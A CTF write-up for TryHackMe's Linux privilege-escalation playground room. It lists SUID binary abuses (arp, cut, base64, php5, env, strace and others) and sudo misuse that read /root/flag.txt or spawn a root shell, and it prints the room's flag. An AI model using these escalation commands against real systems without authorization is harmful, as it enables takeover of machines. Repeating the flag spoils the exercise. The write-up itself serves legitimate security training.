THM: Linux Privesc Playground

Hello, there and it has been a while since my last update, welcome back to another THM CTF writeup. Today, we are going for the most easiest Privilege Escalate (privesc) in the entire THM server. Just like the author, SherlockSec mentioned, there are tons of ways to privesc the machine. Just a small tip, I referred the GTFObin for this challenge. The site contains a list of shell-escaping command. Furthermore, I break the write-up into two major sections, the SUID and the SUDO. Without further ado, let’s get started.

Part 1: SUID

SUID exploitation is quite common in Linux especially users misconfigure the important /bin and /sbin files. If you wanted to know more about SUID exploitation, you can refer to this article. To do a quick search on the SUID files on the system file, simply use the following command

$ find / -perm /4000 2>/dev/null 

The perm 4000 represents permission 4000 which is an SUID bit and we are going to skip all ‘permission denied’ search by using 2>/dev/null/. Alternatively, you also can use mnemonic shortcuts.

$ find / -perm /u=s 2>/dev/null 

Well, there are tons of SUID to exploit with. Always check with the GTFObins and look for the possible SUID file exploitation. Here is the list of SUID that can be exploited.

• arp
• cut
• base64
• tail
• ul
• shuf
• php5
• file
• tclsh8.5
• env
• diff
• strach
• rlwrap
• …… and anything you can find on GTFObins.

For this instance, I’m going to show you the 12 SUID exploitation as a demo and you can figure out the rest using GTFObins.

SUID 1: arp

Link: GTFObins-arp

$ /usr/sbin/arp -v -f /root/flag.txt

SUID 2: cut

Link: GTFObins-cut

$ /usr/bin/cut -d "" -f1 /root/flag.txt

SUID 3: base64

Link: GTFObins-base64

$ /usr/bin/base64 /root/flag.txt | base64 --decode

SUID 4: tail

Link: GTFObins-tail

$ /usr/bin/tail /root/flag.txt

SUID 5: ul

Link: GTFObins-ul

$ /usr/bin/ul /root/flag.txt

SUID 6: shuf

Link: GTFObins-shuf
Instead of reading the flag file like the previous SUID, shuf is used to overwrite the file. This SUID command is quite useful to rewrite the configuration file which cannot be done by lower privileged users. No demo for this SUID.

SUID 7: php5

Link: GTFObins-php

$ /usr/bin/php5 -r "pcntl_exec('/bin/sh');"

SUID 8: file

Link: GTFObins-file

$ /usr/bin/file -m /root/flag.txt

SUID 9: tclsh8.5

Link: GTFObins-tclsh8.5

$ /usr/bin/tclsh8.5
% exec cat /root/flag.txt

SUID 10: env

Link: GTFObins-env

$ /usr/bin/env /bin/sh

SUID 11: diff

Link: GTFObins-diff

$ /usr/bin/diff --line-format=%L /dev/null /root/flag.txt

SUID 12: strace

Link: GTFObins-strace

$ /usr/bin/strace -o /dev/null /bin/sh

Part 2: Sudo

Another privilege escalation method is sudo command. Just small tips here, always check with the ./etc/sudoers or visudo command to check for any misconfiguration on user privilege. To check with the sudo command of a lower privilege user, simply punch in the following line.

$ sudo -l

Actually it is rare to see this kind of stuff in real life. The lower privilege user literally can run anything as sudo. Similarly, you can check the GTFObins for sudo shell-escape. For this demo, I’m going to use the command sudo command, the bash.

$ sudo /bin/bash

Answer: THM{3asy_f14g_1m40}

Conclusion

That’s all for the quick write-up for privesc playground. GTFObins is definitely a useful site to check with the priv escalation in terms of SUID and SUDO. One more thing, check out mzfr’s GTFObins tool, he did a great job on beautifying the tool via terminal. Until next time